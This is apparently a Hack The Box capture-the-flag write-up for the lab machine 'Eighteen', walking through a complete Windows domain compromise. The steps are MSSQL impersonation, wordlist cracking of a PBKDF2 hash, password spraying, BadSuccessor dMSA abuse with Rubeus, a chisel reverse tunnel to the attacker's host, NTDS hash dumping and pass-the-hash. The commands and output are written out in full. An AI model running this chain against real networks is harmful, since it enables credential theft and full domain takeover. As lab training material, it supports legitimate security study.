[Season9] Eighteen WP

kevin / iNa2we6haRj2gaw!

Recon

PORT     STATE SERVICE  REASON          VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 16.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
|_ +7h00m00s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

User Flag

Connect to MSSQL with the provided credentials:

mssqlclient.py kevin@$IP

kevin has been granted IMPERSONATE on the appdev login, so we can switch to that login and read the financial_planner database:
SQL (kevin  guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev

SQL (kevin guest@master)> EXECUTE AS LOGIN = 'appdev'
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> select * from users
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03

SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'

hashcat is too slow on this hash (600,000 PBKDF2 iterations), so I had an AI generate a script that simply feeds rockyou through Werkzeug's own check function:
from werkzeug.security import check_password_hash

# admin's password hash from the financial_planner.users table above
target_hash = "pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"

wordlist_path = "/usr/share/wordlists/rockyou.txt"

print(f"[*] Starting attack on: {target_hash}")
print("[*] Using Werkzeug's native check_password_hash function...")

try:
    with open(wordlist_path, "r", errors="ignore") as f:
        for line in f:
            password = line.strip()

            # check_password_hash parses the pbkdf2 parameters out of the
            # stored string and recomputes the digest for this candidate
            if check_password_hash(target_hash, password):
                print(f"\n[+] PASSWORD FOUND: {password}")
                break
        else:
            # for/else: only reached when the loop finished without a break
            print("\n[-] Password not found in wordlist.")

except FileNotFoundError:
    print(f"\n[!] Error: Wordlist not found at {wordlist_path}")
except Exception as e:
    print(f"\n[!] Error: {e}")

Result: iloveyou1
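As an added example (not part of the original writeup or of Werkzeug), the following shows what check_password_hash actually does with a hash in this format: it splits `pbkdf2:sha256:600000$salt$digest` into its parameters and recomputes the derived key with hashlib, which is why every single guess costs 600,000 HMAC-SHA256 rounds. Function names are my own.

```python
import hashlib
import hmac
from typing import NamedTuple


class WerkzeugPbkdf2(NamedTuple):
    method: str      # digest name, e.g. "sha256"
    iterations: int  # PBKDF2 round count, e.g. 600000
    salt: str        # ASCII salt, stored in clear
    digest: str      # hex-encoded derived key


def parse_werkzeug_pbkdf2(stored: str) -> WerkzeugPbkdf2:
    """Split a Werkzeug "pbkdf2:<method>:<iterations>$<salt>$<hex>" string."""
    pieces = stored.split("$")
    if len(pieces) != 3:
        raise ValueError(f"not a Werkzeug pbkdf2 hash: {stored!r}")
    params, salt, digest = pieces
    parts = params.split(":")  # e.g. ["pbkdf2", "sha256", "600000"]
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError(f"not a Werkzeug pbkdf2 hash: {stored!r}")
    method, iterations = parts[1], int(parts[2])
    if method not in hashlib.algorithms_available:
        raise ValueError(f"unsupported digest {method!r}")
    return WerkzeugPbkdf2(method, iterations, salt, digest)


def make_werkzeug_pbkdf2(password: str, salt: str, iterations: int,
                         method: str = "sha256") -> str:
    """Produce a hash string in the same format (what Werkzeug does for pbkdf2)."""
    dk = hashlib.pbkdf2_hmac(method, password.encode(), salt.encode(), iterations)
    return f"pbkdf2:{method}:{iterations}${salt}${dk.hex()}"


def verify_werkzeug_pbkdf2(stored: str, password: str) -> bool:
    """Recompute the derived key for `password` and compare in constant time."""
    h = parse_werkzeug_pbkdf2(stored)
    dk = hashlib.pbkdf2_hmac(h.method, password.encode(), h.salt.encode(), h.iterations)
    return hmac.compare_digest(dk.hex(), h.digest)


# admin's hash as dumped from the financial_planner.users table in the writeup
TARGET_HASH = ("pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
               "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133")

if __name__ == "__main__":
    h = parse_werkzeug_pbkdf2(TARGET_HASH)
    print(f"method={h.method} iterations={h.iterations} salt={h.salt}")
    print("matches 'iloveyou1':", verify_werkzeug_pbkdf2(TARGET_HASH, "iloveyou1"))
```

The iteration count is what makes the hash expensive; the weak password is what made it crackable anyway, which is the real lesson for the application owner.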

We can now log in to the website's admin panel as admin:iloveyou1, but that does not seem to lead anywhere.

RID brute-force through MSSQL to enumerate domain users:
$ nxc mssql $IP -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.10.11.95 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.10.11.95 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.10.11.95 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.10.11.95 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.10.11.95 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.10.11.95 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.10.11.95 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.10.11.95 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.10.11.95 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.10.11.95 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.10.11.95 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.10.11.95 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.10.11.95 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.10.11.95 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.10.11.95 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.10.11.95 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.10.11.95 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.10.11.95 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.10.11.95 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.10.11.95 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.10.11.95 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.10.11.95 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.10.11.95 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.10.11.95 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.10.11.95 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.10.11.95 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.10.11.95 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.10.11.95 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.10.11.95 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.10.11.95 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.10.11.95 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.10.11.95 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.10.11.95 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.10.11.95 1433 DC01 1612: EIGHTEEN\dave.green

Save the user names obtained into users.txt for password spraying:
Administrator
mssqlsvc
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green

Spray the cracked password against WinRM:
$ nxc winrm $IP -u users.txt -p 'iloveyou1'
WINRM 10.10.11.95 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\Administrator:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\mssqlsvc:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

This gives eighteen.htb\adam.scott:iloveyou1; log in over WinRM and read the user flag:
evil-winrm -i $IP -u 'adam.scott' -p 'iloveyou1'

*Evil-WinRM* PS C:\Users\adam.scott> type desktop/user.txt
ed79a0a16c7d14b46890de4be15dffee

Root Flag

Enumeration shows the target is a Windows Server 2025 domain controller, so it may be affected by BadSuccessor (dMSA abuse).

Use BadSuccessor.ps1 from LuemmelSec/Pentest-Tools-Collection (Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main).

The script needs a small modification first: Out-GridView has no GUI to render into over WinRM, so replace it with Format-Table.

# patch the script
*Evil-WinRM* PS C:\Users\adam.scott> (Get-Content BadSuccessor.ps1) -replace 'Out-GridView', 'Format-Table -AutoSize' | Set-Content BadSuccessor.ps1
# import the module
*Evil-WinRM* PS C:\Users\adam.scott> . .\BadSuccessor.ps1
# check whether the domain is exploitable
*Evil-WinRM* PS C:\Users\adam.scott> BadSuccessor -mode check -Domain eighteen.htb

[+] Checking for Windows Server 2025 Domain Controllers...
[!] Windows Server 2025 DCs found. BadSuccessor may be exploitable!

HostName OperatingSystem
-------- ---------------
DC01.eighteen.htb Windows Server 2025 Datacenter



IdentitySID IdentityName OU Right
----------- ------------ -- -----
S-1-5-21-1152179935-589108180-1989892463-1604 eighteen.htb\IT OU=Staff,DC=eighteen,DC=htb CreateChild

# create the dMSA (adam.scott is in IT, which has CreateChild on OU=Staff)
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "bad_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'bad_DMSA'
Object adam.scott can now impersonate Administrator

# request a TGT for the current user
*Evil-WinRM* PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgt /user:adam.scott /password:iloveyou1 /opsec /nowrap /force

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.3

[*] Action: Ask TGT

[*] Got domain: eighteen.htb
[*] Using domain controller: DC01.eighteen.htb (fe80::214d:667:a861:ca2a%3)
[!] Pre-Authentication required!
[!] AES256 Salt: EIGHTEEN.HTBadam.scott
[*] Using rc4_hmac hash: 9964DAE494A77414E34AFF4F34412166
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::214d:667:a861:ca2a%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : adam.scott (NT_PRINCIPAL)
UserRealm : EIGHTEEN.HTB
StartTime : 11/21/2025 12:14:49 PM
EndTime : 11/21/2025 10:14:49 PM
RenewTill : 11/28/2025 12:14:49 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : /Bn7bJNCwC3SIkDqc/h9fEmnbkurm2zAFG6VMcy0Kjk=
ASREP (key) : 9964DAE494A77414E34AFF4F34412166

# request a krbtgt ticket as the dMSA, using the TGT from the previous step
*Evil-WinRM* PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgs /targetuser:bad_DMSA$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /ticket:<base64 ticket.kirbi from the asktgt output above> /outfile:ticket.kirbi

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.3

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'bad_DMSA$' from 'adam.scott'
[+] Sequence number is: 751902089
[*] Using domain controller: DC01.eighteen.htb (fe80::214d:667:a861:ca2a%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):


ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : bad_DMSA$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 11/21/2025 12:20:57 PM
EndTime : 11/21/2025 12:35:57 PM
RenewTill : 11/28/2025 12:14:49 PM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : JsjHzrIGUou5+3d96zmlzqcMXC3mh7bwvaSow4hErSM=
Current Keys for bad_DMSA$: (aes256_cts_hmac_sha1) 4F55545B8D1E3F1E0B70A19738C1B631CFDFE2867F6E25027CA400BF4F7FB7E2


[*] Ticket written to ticket.kirbi

Set up a SOCKS proxy with chisel (server on the attacker box, client on the target):
./chisel server --socks5 --reverse --port 8080
./chisel.exe client 10.10.16.102:8080 R:socks

Dump the domain hashes. The DC clock is 7 hours ahead of the scanner (see the nmap output), so the Kerberos ticket is only valid if we run the tools under faketime:
$ ticketConverter.py ticket.kirbi ticket.ccache
$ export KRB5CCNAME=ticket.ccache
$ faketime -f "+7h" proxychains secretsdump.py eighteen.htb/bad_dmsa\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/root/.local/pipx/venvs/impacket/lib/python3.10/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01.eighteen.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01.eighteen.htb:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01.eighteen.htb:49676 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
Pwn$:12102:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
dMSA_Luemmel$:12110:aad3b435b51404eeaad3b435b51404ee:9479c12905374756485f184d31e4ec98:::
kreep_dmsa$:12111:aad3b435b51404eeaad3b435b51404ee:ecb0d2b94a4d11d497c42509ffc7e524:::
bad_DMSA$:12112:aad3b435b51404eeaad3b435b51404ee:1e2c79d68b83d013a3dd668c38cb1b7f:::
kreep_dmsa_new$:12113:aad3b435b51404eeaad3b435b51404ee:51945e4f9686351412afba5c72a34239:::
bad_root$:12114:aad3b435b51404eeaad3b435b51404ee:95f0138bff73b060d09007ca19df9f94:::
bad_root2$:12115:aad3b435b51404eeaad3b435b51404ee:f324fe8324bc6dd8ea3f8cfbe38f8b66:::
web_svc$:12116:aad3b435b51404eeaad3b435b51404ee:7fc0d6fd9a8217facbd7b382508e23aa:::
bad_ps$:12117:aad3b435b51404eeaad3b435b51404ee:51cc217548900e3aa68e38186bc78bcf:::
[*] Cleaning up...

Pass the hash as Administrator and read the root flag:
$ faketime -f "+7h" proxychains evil-winrm -i $IP -u Administrator --hash 0b133be956bfaddf9cea56701affddec


*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
87ce69fde501eed974cfa6cdd5418b11